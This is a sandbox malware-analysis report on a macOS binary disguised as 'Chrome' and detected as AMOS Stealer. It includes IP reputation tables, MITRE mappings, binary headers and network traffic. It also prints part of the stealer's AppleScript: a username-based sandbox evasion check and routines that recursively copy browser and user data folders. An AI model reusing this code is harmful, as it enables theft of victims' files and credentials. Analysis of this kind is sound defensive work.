endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon er			Jump to behavior

Source: submission

Source: submission

Code Signing Info: Signature=adhoc

Source: /usr/bin/osascript (PID: 622)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 622)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 623)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 623)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior

Source: /usr/bin/osascript (PID: 622)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 622)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 623)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 623)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior

Source: submission

Source: /usr/bin/osascript (PID: 622)	Random device file read: /dev/random	Jump to behavior
Source: /usr/bin/osascript (PID: 623)	Random device file read: /dev/random	Jump to behavior
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 641)	Random device file read: /dev/random	Jump to behavior

Source: submitted sample

Stderr: 140:155: execution error: An error of type -1 has occurred. (-1): exit code = 0

Source: /usr/bin/osascript (PID: 622)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist			Jump to behavior
Source: /usr/bin/osascript (PID: 623)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist			Jump to behavior

Source: submission

CodeSign Info: Executable=/Users/bernard/Desktop/Chrome

Source: Chrome	Submission file: section __const with 7.95657476 entropy (max. 8.0)
Source: Chrome	Submission file: section __const with 7.99234386 entropy (max. 8.0)

Source: /usr/bin/osascript (PID: 622)	Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc			Jump to behavior
Source: /usr/bin/osascript (PID: 623)	Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc			Jump to behavior

Source: /bin/sh (PID: 622)	Sysctl requested: kern.hostname (1.10)			Jump to behavior
Source: /bin/sh (PID: 623)	Sysctl requested: kern.hostname (1.10)			Jump to behavior

Source: /usr/bin/osascript (PID: 622)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior
Source: /usr/bin/osascript (PID: 623)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior

Stealing of Sensitive Information

Detected AMOS Stealer

Source: /bin/sh (PID: 623)

AMOS Stealer Osscript: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorr

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	13 AppleScript	1 Scripting	Path Interception	11 Invalid Code Signature	OS Credential Dumping	11 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Malicious File	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Code Signing	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Chrome	0%	ReversingLabs
Chrome	0%	Virustotal		Browse

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
184.31.53.25	unknown	United States	16625	AKAMAI-ASUS	false
151.101.3.6	unknown	United States	54113	FASTLYUS	false
151.101.67.6	unknown	United States	54113	FASTLYUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
151.101.3.6	http://www.citibank2.com/citibank/citi/index	Get hash	malicious	Unknown	Browse
	AvayaWorkplaceMacOS-3.38.0.147.18.dmg	Get hash	malicious	Unknown	Browse
	https://jok.darfeistud.ru/n0raBLCJ/	Get hash	malicious	Unknown	Browse
	https://vdot.virginia-ticketrb.xin/us/	Get hash	malicious	Unknown	Browse
	TotalAV.dmg	Get hash	malicious	Unknown	Browse
	Factura.pdf	Get hash	malicious	Unknown	Browse
	Chrome_7.13.dmg-Malware.dmg	Get hash	malicious	AMOS Stealer	Browse
	https://u1.tightlyreporter.shop/sosalkino.mov	Get hash	malicious	Unknown	Browse
	https://email.m.teachable.com/c/eJwsjjmO7CAYBk8DoQUfZgsIXuJrtH4WP9DYsgVMn3_kVsdVKlUO0RTyvARplYO2UjleTmrHq5dU2j1fLQcGSOu8kMY5zwBeg4_KRMRd7xnaU8YaNZHNWpTVi2R4CxDQQiohrYR0SwasszBxjzkqZdgqzmUWSpXiUZZ0nfwIdc57MPWPYWPYcm-jzkb5PR_OsNHvrPwsY9D_8j1TqzBeq2erh5N6esLUf65-f6Ij1es6vjIUrBUf-R3wFwAA__9VN0p8#a2FzcGFyYXNrckB1bml0eTNkLmNvbQ==	Get hash	malicious	Unknown	Browse
	https://smthwentwrong.com	Get hash	malicious	Unknown	Browse
151.101.67.6	http://www.citibank2.com/citibank/citi/index	Get hash	malicious	Unknown	Browse
	AvayaWorkplaceMacOS-3.38.0.147.18.dmg	Get hash	malicious	Unknown	Browse
	https://vdot.virginia-ticketrb.xin/us/	Get hash	malicious	Unknown	Browse
	https://DvRg.atbuovpkz.com/TYjSz/	Get hash	malicious	Unknown	Browse
	https://streetfurniture.com/r-u-ok/	Get hash	malicious	Unknown	Browse
	https://fax304993.courtaccountinghub.com/4G6Yv	Get hash	malicious	Unknown	Browse
	https://email.m.teachable.com/c/eJwsjjmO7CAYBk8DoQUfZgsIXuJrtH4WP9DYsgVMn3_kVsdVKlUO0RTyvARplYO2UjleTmrHq5dU2j1fLQcGSOu8kMY5zwBeg4_KRMRd7xnaU8YaNZHNWpTVi2R4CxDQQiohrYR0SwasszBxjzkqZdgqzmUWSpXiUZZ0nfwIdc57MPWPYWPYcm-jzkb5PR_OsNHvrPwsY9D_8j1TqzBeq2erh5N6esLUf65-f6Ij1es6vjIUrBUf-R3wFwAA__9VN0p8#a2FzcGFyYXNrckB1bml0eTNkLmNvbQ==	Get hash	malicious	Unknown	Browse
	CitrixReceiver11_4_3.dmg	Get hash	malicious	Unknown	Browse
	RVtdWepyLq	Get hash	malicious	Realst	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	http://188.114.96.0	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt	Get hash	malicious	Unknown	Browse	185.199.108.133
	VM Orger Acknowledged.zip	Get hash	malicious	Unknown	Browse	151.101.66.137
	http://188.114.97.3	Get hash	malicious	Unknown	Browse	151.101.65.140
	http://188.114.96.3	Get hash	malicious	Unknown	Browse	151.101.1.140
	https://unifranckm.weebly.com	Get hash	malicious	Unknown	Browse	151.101.1.46
	https://mietamasklogiene.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	151.101.1.140
	https://dev-temporary-ru.pantheonsite.io/wp-content/uploads/2025/03/iukhc.html	Get hash	malicious	Unknown	Browse	23.185.0.2
	https://kjhgt55555555555.blogspot.com/	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://0b47290b-5060-43ed-ab52-5c7b4505b80e-00-bb74c8jbda1u.kirk.replit.dev/	Get hash	malicious	Unknown	Browse	151.101.193.229
AKAMAI-ASUS	http://188.114.96.0	Get hash	malicious	Unknown	Browse	2.23.65.88
	Quotation.xls	Get hash	malicious	Unknown	Browse	23.60.203.209
	http://188.114.97.3	Get hash	malicious	Unknown	Browse	104.73.230.208
	http://188.114.96.3	Get hash	malicious	Unknown	Browse	104.73.230.208
	Quotation.xls	Get hash	malicious	Unknown	Browse	23.199.214.10
	RV Please verify your email preferences.msg	Get hash	malicious	Unknown	Browse	23.60.203.209
	https://gamma.app/docs/britcham-Singapore-are-British-nationals-those-employed-organisat-c99ei1men1fb7in?mode=present#card-wk0hejkpgymg97c	Get hash	malicious	Unknown	Browse	2.16.202.120
	https://pub-399fabd179d94f9eacc22f9f01cf7fae.r2.dev/AT&T%20YAHOO$$$$.htm	Get hash	malicious	HTMLPhisher	Browse	104.73.230.208
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	random(8).exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
FASTLYUS	http://188.114.96.0	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt	Get hash	malicious	Unknown	Browse	185.199.108.133
	VM Orger Acknowledged.zip	Get hash	malicious	Unknown	Browse	151.101.66.137
	http://188.114.97.3	Get hash	malicious	Unknown	Browse	151.101.65.140
	http://188.114.96.3	Get hash	malicious	Unknown	Browse	151.101.1.140
	https://unifranckm.weebly.com	Get hash	malicious	Unknown	Browse	151.101.1.46
	https://mietamasklogiene.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	151.101.1.140
	https://dev-temporary-ru.pantheonsite.io/wp-content/uploads/2025/03/iukhc.html	Get hash	malicious	Unknown	Browse	23.185.0.2
	https://kjhgt55555555555.blogspot.com/	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://0b47290b-5060-43ed-ab52-5c7b4505b80e-00-bb74c8jbda1u.kirk.replit.dev/	Get hash	malicious	Unknown	Browse	151.101.193.229

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5c118da645babe52f060d0754256a73c	AvayaWorkplaceMacOS-3.38.0.147.18.dmg	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	https://jok.darfeistud.ru/n0raBLCJ/	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	https://vdot.virginia-ticketrb.xin/us	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	https://vdot.virginia-ticketrb.xin/us/	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	TotalAV.dmg	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	https://DvRg.atbuovpkz.com/TYjSz/	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	Factura.pdf	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	https://streetfurniture.com/r-u-ok/	Get hash	malicious	Unknown	Browse	151.101.3.6 17.253.7.136 151.101.67.6
	Chrome_7.13.dmg-Malware.dmg	Get hash	malicious	AMOS Stealer	Browse	151.101.3.6 17.253.7.136 151.101.67.6

File type:	Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>]
Entropy (8bit):	3.466987960314955
TrID:	Mac OS X Universal Binary executable (4004/1) 75.96% HSC music composer song (1267/141) 24.04%
File name:	Chrome
File size:	151'280 bytes
MD5:	72676069d026c215aef39c18314a2744
SHA1:	8bbd7dc2d8721215b8606b1b0aa2c48254d0d60e
SHA256:	11317b3ba43ea9dc46d169c9b053660e184ff93a9e98eddcb349eafde3bc845c
SHA512:	f9065bc4b95c9f1373b17e3f55915a8939d03e63cea1a4efbe94ad6699735af8b8f97485d610a6291564db78686e81d6a27db953c500780c100c9c0bdade84fb
SSDEEP:	768:FDJ6nbD9uCM7+/o46ntXK9bNxUAWTZVlhyOQlnXELGP5qbEGMOS1XHSoJ:A9DutXKpbUDVlhyOQlXELKexo
TLSH:	85E3D0536B0D260AC8EF56F44AEF43C75766F4844FA3431B738096292EDB3A19E58C1B
File Content Preview:	..................@.......................N....................................................................................................................................................................................................................

CodeSign Information

["Executable=/Users/bernard/Desktop/Chrome","Identifier=Chrome-55554944d44c2194013c3260b5313a07d2a314e1","Format=Mach-O universal (x86_64 arm64)","CodeDirectory v=20400 size=456 flags=0x2(adhoc) hashes=8+2 location=embedded","VersionPlatform=1","VersionMin=658688","VersionSDK=983552","Hash type=sha256 size=32","CandidateCDHash sha256=dc13ece95255b0a7f87d5051e1bc42af57a793d0","Hash choices=sha256","Executable Segment base=0","Executable Segment limit=24576","Executable Segment flags=0x1","Page size=4096","CDHash=dc13ece95255b0a7f87d5051e1bc42af57a793d0","Signature=adhoc","Info.plist=not bound","TeamIdentifier=not set","Sealed Resources=none","Internal requirements count=0 size=12"]

Static Mach Info

General Information for header 1
Endian:	little-endian
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	17
Entry point:	0x10000075C

segment_64 load command - aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x6000

fileoff

0x0

filesize

0x6000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x10000075C	0x343	0x75C	5.84085920	1	0x0	0	0x80000400
__stubs	__TEXT	0x100000AA0	0x4E	0xAA0	2.81708707	1	0x0	0	0x80000400
__stub_helper	__TEXT	0x100000AEE	0x7E	0xAEE	3.40186343	0	0x0	0	0x80000400
__gcc_except_tab	__TEXT	0x100000B6C	0x38	0xB6C	3.98390610	2	0x0	0	0x0
__const	__TEXT	0x100000BA4	0x53C4	0xBA4	7.95657476	2	0x0	0	0x0
__cstring	__TEXT	0x100005F68	0xD	0x5F68	3.39274741	0	0x0	0	0x0
__unwind_info	__TEXT	0x100005F78	0x88	0x5F78	2.65869091	2	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x100006000

vmsize

0x1000

fileoff

0x6000

filesize

0x1000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA	0x100006000	0x40	0x6000	-0.00000000	3	0x0	0	0x0
__la_symbol_ptr	__DATA	0x100006040	0x58	0x6040	2.03616102	3	0x0	0	0x0
__data	__DATA	0x100006098	0x8	0x6098	-0.00000000	3	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x100007000
vmsize	0x8000
fileoff	0x7000
filesize	0x4D90
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_only load command - aggregated: 1

Name	Value
rebase_off	28672
rebase_size	8
bind_off	28680
bind_size	168
weak_bind_off	28848
weak_bind_size	56
lazy_bind_off	28904
lazy_bind_size	232
export_off	29136
export_size	48

symtab load command - aggregated: 1

Name	Value
symoff	29200
nsyms	21
stroff	29664
strsize	344

dysymtab load command - aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	1
iextdefsym	1
nextdefsym	1
iundefsym	2
nundefsym	19
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	29536
nindirectsyms	32
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

load_dylinker load command - aggregated: 1

Name	Value

uuid load command - aggregated: 1

Name	Value
uuid	4d0f5560-5b51-3ee1-afda-dc90d460a3c6

version_min_macosx load command - aggregated: 1

Name	Value
version	10.13.0
sdk	15.2.0

source_version load command - aggregated: 1

Name	Value
path	0.0.0.0.0

main load command - aggregated: 1

Name	Value

load_dylib load command - aggregated: 2

Name

Value

compatibility_version

1.0.0

current_version

1800.105.0

timestamp

1970-01-01

Datas

/usr/lib/libc++.1.dylib

Name

Value

compatibility_version

1.0.0

current_version

1351.0.0

timestamp

1970-01-01

Datas

/usr/lib/libSystem.B.dylib

function_starts load command - aggregated: 1

Name	Value
dataoff	29184
datasize	16

data_in_code load command - aggregated: 1

Name	Value
dataoff	29200
datasize	0

code_signature load command - aggregated: 1

Name	Value
dataoff	30016
datasize	18512

Symbols

Name	Category	Origin	Segment Name	Bind Address	Library Name
__mh_execute_header	EXTERNAL	LC_SYMTAB
radr://5614542	LOCAL	LC_SYMTAB
__Unwind_Resume	UNDEFINED	LC_SYMTAB	__DATA	0x100006040	/usr/lib/libSystem.B.dylib
__ZNSt11logic_errorC2EPKc	UNDEFINED	LC_SYMTAB	__DATA	0x100006048	/usr/lib/libc++.1.dylib
__ZNSt12length_errorD1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006000	/usr/lib/libc++.1.dylib
__ZTISt12length_error	UNDEFINED	LC_SYMTAB	__DATA	0x100006008
__ZTVSt12length_error	UNDEFINED	LC_SYMTAB	__DATA	0x100006010	/usr/lib/libc++.1.dylib
__ZdlPv	UNDEFINED	LC_SYMTAB	__DATA	0x100006018
__Znwm	UNDEFINED	LC_SYMTAB	__DATA	0x100006020
___bzero	UNDEFINED	LC_SYMTAB	__DATA	0x100006050	/usr/lib/libSystem.B.dylib
___cxa_allocate_exception	UNDEFINED	LC_SYMTAB	__DATA	0x100006058	/usr/lib/libc++.1.dylib
___cxa_free_exception	UNDEFINED	LC_SYMTAB	__DATA	0x100006060	/usr/lib/libc++.1.dylib
___cxa_throw	UNDEFINED	LC_SYMTAB	__DATA	0x100006068	/usr/lib/libc++.1.dylib
___gxx_personality_v0	UNDEFINED	LC_SYMTAB	__DATA	0x100006028	/usr/lib/libc++.1.dylib
___stack_chk_fail	UNDEFINED	LC_SYMTAB	__DATA	0x100006070	/usr/lib/libSystem.B.dylib
___stack_chk_guard	UNDEFINED	LC_SYMTAB	__DATA	0x100006030	/usr/lib/libSystem.B.dylib
_memcpy	UNDEFINED	LC_SYMTAB	__DATA	0x100006078	/usr/lib/libSystem.B.dylib
_memmove	UNDEFINED	LC_SYMTAB	__DATA	0x100006080	/usr/lib/libSystem.B.dylib
_strlen	UNDEFINED	LC_SYMTAB	__DATA	0x100006088	/usr/lib/libSystem.B.dylib
_system	UNDEFINED	LC_SYMTAB	__DATA	0x100006090	/usr/lib/libSystem.B.dylib
dyld_stub_binder	UNDEFINED	LC_SYMTAB	__DATA	0x100006038	/usr/lib/libSystem.B.dylib

General Information for header 2
Endian:	little-endian
Size:	64-bit
Architecture:	arm64
Filetype:	execute
Nbr. of load commands:	18
Entry point:	0x1000026C8

segment_64 load command - aggregated: 5

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x8000

fileoff

0x0

filesize

0x8000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x1000026C8	0x368	0x26C8	6.26350883	2	0x0	0	0x80000400
__stubs	__TEXT	0x100002A30	0x9C	0x2A30	3.48975029	2	0x0	0	0x80000400
__stub_helper	__TEXT	0x100002ACC	0x9C	0x2ACC	3.56717327	2	0x0	0	0x80000400
__gcc_except_tab	__TEXT	0x100002B68	0x3C	0x2B68	3.72501076	2	0x0	0	0x0
__const	__TEXT	0x100002BA4	0x53C4	0x2BA4	7.99234386	2	0x0	0	0x0
__cstring	__TEXT	0x100007F68	0xD	0x7F68	3.39274741	0	0x0	0	0x0
__unwind_info	__TEXT	0x100007F78	0x88	0x7F78	2.48220958	2	0x0	0	0x0

Name

Value

segname

__DATA_CONST

vmaddr

0x100008000

vmsize

0x4000

fileoff

0x8000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x10

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA_CONST	0x100008000	0x48	0x8000	-0.00000000	3	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x10000C000

vmsize

0x4000

fileoff

0xC000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__la_symbol_ptr	__DATA	0x10000C000	0x58	0xC000	2.08689276	3	0x0	0	0x0
__data	__DATA	0x10000C058	0x8	0xC058	-0.00000000	3	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x100010000
vmsize	0x8000
fileoff	0x10000
filesize	0x4EF0
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_only load command - aggregated: 1

Name	Value
rebase_off	65536
rebase_size	8
bind_off	65544
bind_size	200
weak_bind_off	65744
weak_bind_size	56
lazy_bind_off	65800
lazy_bind_size	232
export_off	66032
export_size	48

symtab load command - aggregated: 1

Name	Value
symoff	66096
nsyms	22
stroff	66584
strsize	360

dysymtab load command - aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	1
iextdefsym	1
nextdefsym	1
iundefsym	2
nundefsym	20
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	66448
nindirectsyms	33
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

load_dylinker load command - aggregated: 1

Name	Value

uuid load command - aggregated: 1

Name	Value
uuid	d44c2194-013c-3260-b531-3a07d2a314e1

build_version load command - aggregated: 1

Name	Value

source_version load command - aggregated: 1

Name	Value
path	0.0.0.0.0

main load command - aggregated: 1

Name	Value

load_dylib load command - aggregated: 2

Name

Value

compatibility_version

1.0.0

current_version

1800.105.0

timestamp

1970-01-01

Datas

/usr/lib/libc++.1.dylib

Name

Value

compatibility_version

1.0.0

current_version

1351.0.0

timestamp

1970-01-01

Datas

/usr/lib/libSystem.B.dylib

function_starts load command - aggregated: 1

Name	Value
dataoff	66080
datasize	16

data_in_code load command - aggregated: 1

Name	Value
dataoff	66096
datasize	0

code_signature load command - aggregated: 1

Name	Value
dataoff	66944
datasize	18800

Symbols

Name	Category	Origin	Segment Name	Bind Address	Library Name
__mh_execute_header	EXTERNAL	LC_SYMTAB
radr://5614542	LOCAL	LC_SYMTAB
__Unwind_Resume	UNDEFINED	LC_SYMTAB	__DATA	0x10000C000	/usr/lib/libSystem.B.dylib
__ZNSt11logic_errorC2EPKc	UNDEFINED	LC_SYMTAB	__DATA	0x10000C008	/usr/lib/libc++.1.dylib
__ZNSt12length_errorD1Ev	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008000	/usr/lib/libc++.1.dylib
__ZTISt12length_error	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008008
__ZTVSt12length_error	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008010	/usr/lib/libc++.1.dylib
__ZdlPv	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008018
__Znwm	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008020
___chkstk_darwin	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008028	/usr/lib/libSystem.B.dylib
___cxa_allocate_exception	UNDEFINED	LC_SYMTAB	__DATA	0x10000C010	/usr/lib/libc++.1.dylib
___cxa_free_exception	UNDEFINED	LC_SYMTAB	__DATA	0x10000C018	/usr/lib/libc++.1.dylib
___cxa_throw	UNDEFINED	LC_SYMTAB	__DATA	0x10000C020	/usr/lib/libc++.1.dylib
___gxx_personality_v0	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008030	/usr/lib/libc++.1.dylib
___stack_chk_fail	UNDEFINED	LC_SYMTAB	__DATA	0x10000C028	/usr/lib/libSystem.B.dylib
___stack_chk_guard	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008038	/usr/lib/libSystem.B.dylib
_bzero	UNDEFINED	LC_SYMTAB	__DATA	0x10000C030	/usr/lib/libSystem.B.dylib
_memcpy	UNDEFINED	LC_SYMTAB	__DATA	0x10000C038	/usr/lib/libSystem.B.dylib
_memmove	UNDEFINED	LC_SYMTAB	__DATA	0x10000C040	/usr/lib/libSystem.B.dylib
_strlen	UNDEFINED	LC_SYMTAB	__DATA	0x10000C048	/usr/lib/libSystem.B.dylib
_system	UNDEFINED	LC_SYMTAB	__DATA	0x10000C050	/usr/lib/libSystem.B.dylib
dyld_stub_binder	UNDEFINED	LC_SYMTAB	__DATA_CONST	0x100008040	/usr/lib/libSystem.B.dylib

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 13:10:16.248924971 CET	443	49351	17.253.7.136	192.168.11.12
Mar 14, 2025 13:10:16.249739885 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.250963926 CET	49351	443	192.168.11.12	17.253.7.136
Mar 14, 2025 13:10:16.270095110 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.271843910 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.271857977 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.271867990 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.272082090 CET	443	49350	151.101.67.6	192.168.11.12
Mar 14, 2025 13:10:16.272699118 CET	49350	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.272728920 CET	49350	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.273685932 CET	49350	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.283878088 CET	49350	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.310753107 CET	49352	443	192.168.11.12	151.101.67.6
Mar 14, 2025 13:10:16.324810982 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.325444937 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.325489044 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.325517893 CET	443	49348	17.248.195.72	192.168.11.12
Mar 14, 2025 13:10:16.326159954 CET	49348	443	192.168.11.12	17.248.195.72
Mar 14, 2025 13:10:16.326244116 CET	49348	443	192.168.11.12	17.248.195.72
